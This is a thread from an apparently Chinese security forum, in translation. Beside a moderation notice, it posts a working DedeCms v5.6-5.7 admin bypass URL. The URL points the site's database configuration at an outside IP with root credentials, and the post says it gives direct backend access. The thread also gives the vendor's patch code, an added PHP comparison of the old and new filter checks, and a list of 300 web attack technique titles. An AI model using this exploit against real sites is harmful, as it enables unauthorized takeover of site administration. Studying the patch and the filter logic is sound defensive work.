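Forum content and invalid IDs will be purged

Because the forum has been poorly managed lately, and with all the censorship pressure on top of that, the atmosphere for discussion is not what it used to be. A cleanup is therefore necessary. We hope everyone understands!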

 


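非安全中国网 disclaimer: 1. All statements and images in this post are solely the personal opinion of the poster and have nothing to do with this site's position;
2. This topic was posted by 無情; the poster 無情 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the associated rights;
3. Other organizations or individuals must obtain the consent of the poster 無情 and of this site before using, reposting or quoting this post;
4. Part of the work in this post is reposted from other media and published on this site; the purpose of reposting is to pass on more information and does not mean that this site agrees with its views or is responsible for its authenticity;
5. If this post infringes the copyright of your site or of an individual, please notify this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.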

Should have been done long ago.

TOP

Notice: the author has been banned or deleted; the content is automatically hidden.

TOP

/picks nose  Uncle, don't you dare purge my little sock-puppet account...
Hmph, this big sis is no insider at all~

TOP

DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability
http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current CAPTCHA code and you can get straight into the site's admin backend.

This vulnerability can only be used if the admin backend path is known.

Official temporary fix:

Find the file include/common.inc.php and replace:

    foreach($_REQUEST as $_k=>$_v)
    {
        var_dump($_k);
        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
        {
            exit('Request var not allow!');
        }
    }

with:

    // Check and register externally submitted variables
    function CheckRequest(&$val) {
        if (is_array($val)) {
            foreach ($val as $_k=>$_v) {
                CheckRequest($_k);
                CheckRequest($val[$_k]);
            }
        } else
        {
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
            {
                exit('Request var not allow!');
            }
        }
    }
    CheckRequest($_REQUEST);

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow.

TOP
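The difference between the two checks in the post above, as an added PHP example that is not part of the original post or of DedeCms: the old loop tests only top-level request keys, so a blocked name nested under another key is never compared against the pattern, while the recursive form walks every key and value. The function names and sample query strings are constructed for illustration, and the functions return a boolean instead of calling exit().

```php
<?php
// Added illustration, not DedeCms source. Function names and the sample
// query strings below are constructed for this example.

const BLOCKED_NAME = '#^(cfg_|GLOBALS)#';   // pattern taken from the post

// The check being replaced: only top-level request keys are tested.
function shallowCheckPasses(array $request): bool
{
    foreach ($request as $key => $_) {
        $key = (string) $key;
        if (strlen($key) > 0 && preg_match(BLOCKED_NAME, $key)) {
            return false;
        }
    }
    return true;
}

// The replacement's logic: every key and every scalar value, at any depth.
// Returns a boolean here instead of calling exit() so both can be compared.
function recursiveCheckPasses($val): bool
{
    if (is_array($val)) {
        foreach ($val as $key => $item) {
            if (!recursiveCheckPasses($key) || !recursiveCheckPasses($item)) {
                return false;
            }
        }
        return true;
    }
    $val = (string) $val;
    return !(strlen($val) > 0 && preg_match(BLOCKED_NAME, $val));
}

// Constructed inputs; db.example.test is a placeholder host.
$samples = [
    'ordinary form fields'      => 'userid=alice&page=2',
    'blocked name at top level' => 'cfg_dbhost=db.example.test',
    'blocked name nested'       => '_POST[GLOBALS][cfg_dbhost]=db.example.test',
    'blocked prefix in a value' => 'keyword=cfg_basehost',
];

foreach ($samples as $label => $query) {
    // parse_str builds nested arrays from bracketed names, as PHP does for requests
    parse_str($query, $request);
    printf(
        "%-27s shallow=%-6s recursive=%s\n",
        $label,
        shallowCheckPasses($request) ? 'pass' : 'reject',
        recursiveCheckPasses($request) ? 'pass' : 'reject'
    );
}
```

The last sample shows a side effect of the recursive form: because it tests values as well as keys, it also rejects a legitimate field whose value merely begins with cfg_ or GLOBALS.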

(2006-2009) Summary of 300 attack techniques
(2006:1-65 | 2007:66-148 | 2008:149-218 | 2009:219-300) 300 ideas, 300 ways of lateral thinking. Some of the articles can only be read from outside the firewall.
1. The Attack of the TINY URLs
2. Backdooring MP3 Files
3. Backdooring QuickTime Movies
4. CSS history hacking with evil marketing
5. I know where you've been
6. Stealing Search Engine Queries with JavaScript
7. Hacking RSS Feeds
8. MX Injection : Capturing and Exploiting Hidden Mail Servers
9. Blind web server fingerprinting
10. JavaScript Port Scanning
11. CSRF with MS Word
12. Backdooring PDF Files
13. Exponential XSS Attacks
14. Malformed URL in Image Tag Fingerprints Internet Explorer
15. JavaScript Portscanning and bypassing HTTP Auth
16. Bruteforcing HTTP Auth in Firefox with JavaScript
17. Bypassing Mozilla Port Blocking
18. How to defeat digg.com
19. A story that diggs itself
20. Expect Header Injection Via Flash
21. Forging HTTP request headers with Flash
22. Cross Domain Leakage With Image Size
23. Enumerating Through User Accounts
24. Widespread XSS for Google Search Appliance
25. Detecting States of Authentication With Protected Images
26. XSS Fragmentation Attacks
27. Poking new holes with Flash Crossdomain Policy Files
28. Google Indexes XSS
29. XML Intranet Port Scanning
30. IMAP Vulnerable to XSS
31. Detecting Privoxy Users and Circumventing It
32. Using CSS to De-Anonymize
33. Response Splitting Filter Evasion
34. CSS History Stealing Acts As Cookie
35. Detecting FireFox Extentions
36. Stealing User Information Via Automatic Form Filling
37. Circumventing DNS Pinning for XSS
38. Netflix.com XSRF vuln
39. Browser Port Scanning without JavaScript
40. Widespread XSS for Google Search Appliance
41. Bypassing Filters With Encoding
42. Variable Width Encoding
43. Network Scanning with HTTP without JavaScript
44. AT&T Hack Highlights Web Site Vulnerabilities
45. How to get linked from Slashdot
46. F5 and Acunetix XSS disclosure
47. Anti-DNS Pinning and Circumventing Anti-Anti DNS pinning
48. Google plugs phishing hole
49. Nikon magazine hit with security breach
50. Governator Hack
51. Metaverse breached: Second Life customer database hacked
52. HostGator: cPanel Security Hole Exploited in Mass Hack
53. Firefox Extensions
54. ABC News (AU) XSS linking the reporter to Al Qaeda
55. Account Hijackings Force LiveJournal Changes
56. Xanga Hit By Script Worm
57. Advanced Web Attack Techniques using GMail
58. PayPal Security Flaw allows Identity Theft
59. Internet Explorer 7 "mhtml:" Redirection Information Disclosure
60. Bypassing of web filters by using ASCII
61. Selecting Encoding Methods For XSS Filter Evasion
62. Adultspace XSS Worm
63. Anonymizing RFI Attacks Through Google
64. Google Hacks On Your Behalf
65. Google Dorks Strike Again
66. Cross-Site Printing
67. Stealing Pictures with Picasa
68. HScan Redux
69. ISO-8895-1 Vulnerable in Firefox to Null Injection
70. MITM attack to overwrite addons in Firefox
71. Microsoft ASP.NET Request Validation Bypass Vulnerability
72. Non-Alpha-Non-Digit 3
73. Steal History without JavaScript
74. Pure Java™, Pure Evil™ Popups
75. Google Adsense CSRF hole
76. There’s an OAK TREE in my blog!?!?!
77. BK for Mayor of Oak Tree View
78. Google Docs puts Google Users at Risk
79. All Your Google Docs are Belong To US…
80. Java Applets and DNS Rebinding
81. Scanning internal Lan with PHP remote file opening.
82. Firefox File Handling Woes
83. Firefoxurl URI Handler Flaw
84. Bugs in the Browser: Firefox’s DATA URL Scheme Vulnerability
85. Multiviews Apache, Accept Requests and free listing
86. Optimizing the number of requests in blind SQL injection
87. Bursting Performances in Blind SQL Injection - Take 2
88. Port Scan without JavaScript
89. Favorites Gone Wild
90. Cross-Browser Proxy Unmasking
91. Spoofing Firefox protected objects
92. Injecting the script tag into XML
93. Login Detection without JavaScript
94. Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration
95. Username Enumeration Timing Attacks
96. Google GMail E-mail Hijack Technique
97. Recursive Request DoS
98. Exaggerating Timing Attack Results Via GET Flooding
99. Initiating Probes Against Servers Via Other Servers
100. Effects of DNS Rebinding On IE’s Trust Zones
101. Paper on Hacking Intranets Using Websites
102. More Port Scanning - This Time in Flash
103. HTTP Response Splitting and Data: URI scheme in Firefox
104. Res:// Protocol Local File Enumeration
105. Res Timing Attack
106. IE6.0 Protocol Guessing
107. IE 7 and Firefox Browsers Digest Authentication Request Splitting
108. Hacking Intranets Via Brute Force
109. Hiding JS in Valid Images
110. Internet Archiver Port Scanner
111. Noisy Decloaking Methods
112. Code Execution Through Filenames in Uploads
113. Cross Domain Basic Auth Phishing Tactics
114. Additional Image Bypass on Windows
115. Detecting users via Authenticated Redirects
116. Passing Malicious PHP Through getimagesize()
117. Turn Any Page Into A Greasemonkey Popup
118. Enumerate Windows Users In JS
119. Anti-DNS Pinning ( DNS Rebinding ) + Socket in FLASH
120. Iframe HTTP Ping
121. Read Firefox Settings (PoC)
122. Stealing Mouse Clicks for Banner Fraud
123. (Non-Persistent) Untraceable XSS Attacks
124. Inter Protocol Exploitation
125. Detecting Default Browser in IE
126. Bypass port blocking in Firefox, Opera and Konqueror.
127. LocalRodeo Detection
128. Image Names Gone Bad
129. IE Sends Local Addresses in Referer Header
130. PDF XSS Can Compromise Your Machine
131. Universal XSS in Adobe’s Acrobat Reader Plugin
132. Firefox Popup Blocker Allows Reading Arbitrary Local Files
133. IE7.0 Detector
134. overwriting cookies on other people’s domains in Firefox.
135. Embeding SVG That Contains XSS Using Base64 Encoding in Firefox
136. Firefox Header Redirection JavaScript Execution
137. More URI Stuff…
138. Hacking without 0days: Drive-by Java
139. Google Urchin password theft madness
140. Username Enumeration Vulnerabilities
141. Client-side SQL Injection Attacks
142. Content-Disposition Hacking
143. Flash Cookie Object Tracking
144. Java JAR Attacks and Features
145. Severe XSS in Google and Others due to the JAR protocol issues
146. Web Mayhem: Firefox’s JAR: Protocol issues
147. 0DAY: QuickTime pwns Firefox
148. Exploiting Second Life
149. CUPS Detection
150. CSRFing the uTorrent plugin
151. Clickjacking / Videojacking
152. Bypassing URL Authentication and Authorization with HTTP Verb Tampering
153. I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
154. Safari Carpet Bomb
155. Flash clipboard Hijack
156. Flash Internet Explorer security model bug
157. Frame Injection Fun
158. Free MacWorld Platinum Pass? Yes in 2008!
159. Diminutive Worm, 161 byte Web Worm
160. SNMP XSS Attack (1)
161. Res Timing File Enumeration Without JavaScript in IE7.0
162. Stealing Basic Auth with Persistent XSS
163. Smuggling SMTP through open HTTP proxies
164. Collecting Lots of Free 'Micro-Deposits'
165. Using your browser URL history to estimate gender
166. Cross-site File Upload Attacks
167. Same Origin Bypassing Using Image Dimensions
168. HTTP Proxies Bypass Firewalls
169. Join a Religion Via CSRF
170. Cross-domain leaks of site logins via Authenticated CSS
171. JavaScript Global Namespace Pollution
172. GIFAR
173. HTML/CSS Injections - Primitive Malicious Code
174. Hacking Intranets Through Web Interfaces
175. Cookie Path Traversal
176. Racing to downgrade users to cookie-less authentication
177. MySQL and SQL Column Truncation Vulnerabilities
178. Building Subversive File Sharing With Client Side Applications
179. Firefox XML injection into parse of remote XML
180. Firefox cross-domain information theft
181. Firefox 2 and WebKit nightly cross-domain image theft
182. Browser's Ghost Busters
183. Exploiting XSS vulnerabilities on cookies
184. Breaking Google Gears' Cross-Origin Communication Model
185. Flash Parameter Injection
186. Cross Environment Hopping
187. Exploiting Logged Out XSS Vulnerabilities
188. Exploiting CSRF Protected XSS
189. ActiveX Repurposing, (1, 2)
190. Tunneling tcp over http over sql-injection
191. Arbitrary TCP over uploaded pages
192. Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
193. JavaScript Code Flow Manipulation
194. Common localhost dns misconfiguration can lead to "same site" scripting
195. Pulling system32 out over blind SQL Injection
196. Dialog Spoofing - Firefox Basic Authentication
197. Skype cross-zone scripting vulnerability
198. Safari pwns Internet Explorer
199. IE "Print Table of Links" Cross-Zone Scripting Vulnerability
200. A different Opera
201. Abusing HTML 5 Structured Client-side Storage
202. SSID Script Injection
203. DHCP Script Injection
204. File Download Injection
205. Navigation Hijacking (Frame/Tab Injection Attacks)
206. UPnP Hacking via Flash
207. Total surveillance made easy with VoIP phone
208. Social Networks Evil Twin Attacks
209. Recursive File Include DoS
210. Multi-pass filters bypass
211. Session Extending
212. Code Execution via XSS (1)
213. Redirector’s hell
214. Persistent SQL Injection
215. JSON Hijacking with UTF-7
216. SQL Smuggling
217. Abusing PHP Sockets (1, 2)
218. CSRF on Novell GroupWise WebAccess
219. Persistent Cookies and DNS Rebinding Redux
220. iPhone SSL Warning and Safari Phishing
221. RFC 1918 Blues
222. Slowloris HTTP DoS
223. CSRF And Ignoring Basic/Digest Auth
224. Hash Information Disclosure Via Collisions - The Hard Way
225. Socket Capable Browser Plugins Result In Transparent Proxy Abuse
226. XMLHTTPReqest “Ping” Sweeping in Firefox 3.5+
227. Session Fixation Via DNS Rebinding
228. Quicky Firefox DoS
229. DNS Rebinding for Credential Brute Force
230. SMBEnum
231. DNS Rebinding for Scraping and Spamming
232. SMB Decloaking
233. De-cloaking in IE7.0 Via Windows Variables
234. itms Decloaking
235. Flash Origin Policy Issues
236. Cross-subdomain Cookie Attacks
237. HTTP Parameter Pollution (HPP)
238. How to use Google Analytics to DoS a client from some website.
239. Our Favorite XSS Filters and how to Attack them
240. Location based XSS attacks
241. PHPIDS bypass
242. I know what your friends did last summer
243. Detecting IE in 12 bytes
244. Detecting browsers javascript hacks
245. Inline UTF-7 E4X javascript hijacking
246. HTML5 XSS
247. Opera XSS vectors
248. New PHPIDS vector
249. Bypassing CSP for fun, no profit
250. Twitter misidentifying context
251. Ping pong obfuscation
252. HTML5 new XSS vectors
253. About CSS Attacks
254. Web pages Detecting Virtualized Browsers and other tricks
255. Results, Unicode Left/Right Pointing Double Angel Quotation Mark
256. Detecting Private Browsing Mode
257. Cross-domain search timing
258. Bonus Safari XXE (only affecting Safari 4 Beta)
259. Apple's Safari 4 also fixes cross-domain XML theft
260. Apple's Safari 4 fixes local file theft attack
261. A more plausible E4X attack
262. A brief description of how to become a CA
263. Creating a rogue CA certificate
264. Browser scheme/slash quirks
265. Cross-protocol XSS with non-standard service ports
266. Forget sidejacking, clickjacking, and carjacking: enter “Formjacking”
267. MD5 extension attack
268. Attack - PDF Silent HTTP Form Repurposing Attacks
269. XSS Relocation Attacks through Word Hyperlinking
270. Hacking CSRF Tokens using CSS History Hack
271. Hijacking Opera’s Native Page using malicious RSS payloads
272. Millions of PDF invisibly embedded with your internal disk paths
273. Exploiting IE8 UTF-7 XSS Vulnerability using Local Redirection
274. Pwning Opera Unite with Inferno’s Eleven
275. Using Blended Browser Threats involving Chrome to steal files on your computer
276. Bypassing OWASP ESAPI XSS Protection inside Javascript
277. Hijacking Safari 4 Top Sites with Phish Bombs
278. Yahoo Babelfish - Possible Frame Injection Attack - Design Stringency
279. Gmail - Google Docs Cookie Hijacking through PDF Repurposing & PDF
280. IE8 Link Spoofing - Broken Status Bar Integrity
281. Blind SQL Injection: Inference thourgh Underflow exception
282. Exploiting Unexploitable XSS
283. Clickjacking & OAuth
284. Google Translate - Google User Content - File Uploading Cross - XSS and Design Stringency - A Talk
285. Active Man in the Middle Attacks
286. Cross-Site Identification (XSid)
287. Microsoft IIS with Metasploit evil.asp;.jpg
288. MSWord Scripting Object XSS Payload Execution Bug and Random CLSID Stringency
289. Generic cross-browser cross-domain theft
290. Popup & Focus URL Hijacking
291. Advanced SQL injection to operating system full control (whitepaper)
292. Expanding the control over the operating system from the database
293. HTML+TIME XSS attacks
294. Enumerating logins via Abuse of Functionality vulnerabilities
295. Hellfire for redirectors
296. DoS attacks via Abuse of Functionality vulnerabilities
297. URL Spoofing vulnerability in bots of search engines (#2)
298. URL Hiding - new method of URL Spoofing attacks
299. Exploiting Facebook Application XSS Holes to Make API Requests
300. Unauthorized TinyURL URL Enumeration Vulnerability

TOP
